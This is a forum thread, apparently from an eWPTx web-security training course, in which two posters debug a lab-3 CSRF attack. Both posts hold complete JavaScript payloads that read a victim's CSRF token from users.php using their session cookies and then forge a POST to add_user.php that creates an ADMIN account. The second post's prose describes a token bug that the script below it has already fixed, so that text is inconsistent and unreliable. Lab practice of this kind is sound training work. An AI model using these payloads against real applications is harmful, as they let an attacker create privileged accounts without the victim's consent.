eWPTx - CSRF3 Lab

Hi there. I am doing CSRF Lab 3 and do not understand why my script won’t work. It keeps saying I need to add the token, but my script reads the token out of users.php and appends it to the POST, so it should have taken care of that.

<script type="text/javascript">

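// Forge the state-changing request: POST a new ADMIN user to add_user.php on
// behalf of the logged-in victim.
//
// token: the victim's CSRFToken value scraped from users.php. It is sent
// URL-encoded so characters such as '+', '/' or '=' in the token survive
// form decoding on the server (the original concatenated it raw).
//
// withCredentials is set to the boolean true. The original assigned the
// string 'true', which only worked because any non-empty string is truthy.
function addUser(token)
{
    const url = "http://3.csrf.labs/add_user.php";
    // Same field set as the legitimate form. `submit` is sent as a bare key,
    // presumably so a server-side "is submit set" check passes -- TODO confirm
    // against the lab's form.
    const params = "name=Malice&surname=Smith&email=malice3%40hacker.site&role=ADMIN&submit&CSRFToken=" + encodeURIComponent(token);

    const CSRF = new XMLHttpRequest();
    CSRF.open("POST", url, true);
    // Attach the victim's session cookie to the cross-origin POST.
    CSRF.withCredentials = true;
    CSRF.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // Surface the server's verdict while debugging; the lab's "token missing"
    // message otherwise disappears into a response nobody reads.
    CSRF.onload = function () {
        console.log("add_user.php -> " + CSRF.status, CSRF.responseText);
    };
    CSRF.send(params);
}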


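// Step 1: fetch users.php as the victim and scrape the CSRF token from it.
//
// NOTE(review): the token is bound to the victim's session, so this GET has to
// carry the victim's cookies (withCredentials) exactly like the POST does; the
// original only set it on the POST. If this page is hosted on an origin other
// than 3.csrf.labs, the browser additionally lets the script read the response
// only when the lab answers with Access-Control-Allow-Origin for this origin
// and Access-Control-Allow-Credentials: true -- otherwise status is 0,
// responseText is empty, and the original code died on `null.value`.
const XHR = new XMLHttpRequest();
XHR.withCredentials = true;
XHR.onreadystatechange = function () {
    if (XHR.readyState !== 4) {
        return;
    }
    // users.php is expected to answer 200 with the HTML form; anything else
    // (CORS failure, redirect to login) means there is no token to steal.
    if (XHR.status !== 200) {
        console.error("users.php could not be read (status " + XHR.status + "); check session cookie / CORS");
        return;
    }
    const doc = new DOMParser().parseFromString(XHR.responseText, "text/html");
    // The lab's field may be identified by id or only by name -- try both
    // instead of assuming an id exists.
    const field = doc.getElementById("CSRFToken") || doc.querySelector('input[name="CSRFToken"]');
    if (!field || !field.value) {
        console.error("No CSRFToken field found in the users.php response");
        return;
    }
    addUser(field.value);
};
XHR.open("GET", "http://3.csrf.labs/users.php", true);
XHR.send();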
      
</script>

Please help

Hi there, the issue is not your script or the one provided by the lab, but the lab itself. According to the lab description, the simulated user Irma Galagos is supposed to perform actions that would execute your script, but that never seems to happen.

In my case, I am redoing the lab to see if I can finally get it to work, but it still doesn’t. I’ve run several iterations, from the one provided to my own, and got nothing. If you like, see if this one executes for you, but I doubt it. (Before blaming the lab, note that the script below has a defect of its own: `&submit=CSRFToken=` makes the token the value of the `submit` field and sends no `CSRFToken` parameter at all, so the server would legitimately report the token as missing.) Cheers!

<script type="text/javascript">
// Base URL of the lab host; every request below is built relative to it.
const url = 'http://3.csrf.labs/';
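// Forge the state-changing request: POST a new ADMIN user to add_user.php on
// behalf of the logged-in victim.
//
// token: the victim's CSRFToken value scraped from users.php.
//
// Bug fixed here: the original body ended in "&submit=CSRFToken=" + token,
// which sends the token as the VALUE of the `submit` field and no CSRFToken
// parameter at all, so a server that validates the token would see it as
// missing. `submit` is now a bare key and the token is URL-encoded so '+',
// '/' or '=' in it survive form decoding.
function addUser(token) {
    const params = "name=Malice&surname=Smith&email=malice%40hacker.site&role=ADMIN&submit&CSRFToken=" + encodeURIComponent(token);

    const req = new XMLHttpRequest();
    req.open('POST', url + "add_user.php", true);
    // Attach the victim's session cookie to the cross-origin POST.
    req.withCredentials = true;
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // Log the server's verdict while debugging; the lab's "token missing"
    // message lives in the response body, which the original never read.
    req.onload = function () {
        console.log("add_user.php -> " + req.status, req.responseText);
    };
    req.send(params);
}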
 
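// Step 1: fetch users.php as the victim and scrape the CSRF token from it.
//
// NOTE(review): the token is per-session, so this GET must carry the victim's
// cookies (withCredentials) like the POST does; the original only set it on
// the POST. If this page is hosted on an origin other than 3.csrf.labs, the
// browser lets the script read the response only when the lab replies with
// Access-Control-Allow-Origin for this origin and
// Access-Control-Allow-Credentials: true; without that, status is 0 and
// responseText is empty, so there is no token to forward.
const xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) return;
    // users.php is expected to answer 200 with the HTML form; anything else
    // (CORS failure, redirect to login) means there is no token to steal.
    if (xhr.status !== 200) {
        console.error(`users.php unreadable (status ${xhr.status}); check session cookie / CORS`);
        return;
    }
    const doc = new DOMParser().parseFromString(xhr.responseText, "text/html");
    // The lab form may expose the token by id or only by name. Do NOT fall back
    // to "the first <input>" as the original did -- that silently posts whatever
    // field happens to come first and hides the real failure.
    const field = doc.getElementById("CSRFToken") ?? doc.querySelector('input[name="CSRFToken"]');
    const token = field?.value;
    if (!token) {
        console.error("CSRFToken field not found in the users.php response");
        return;
    }
    addUser(token);
};
xhr.open('GET', url + "users.php", true);
xhr.send();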
</script>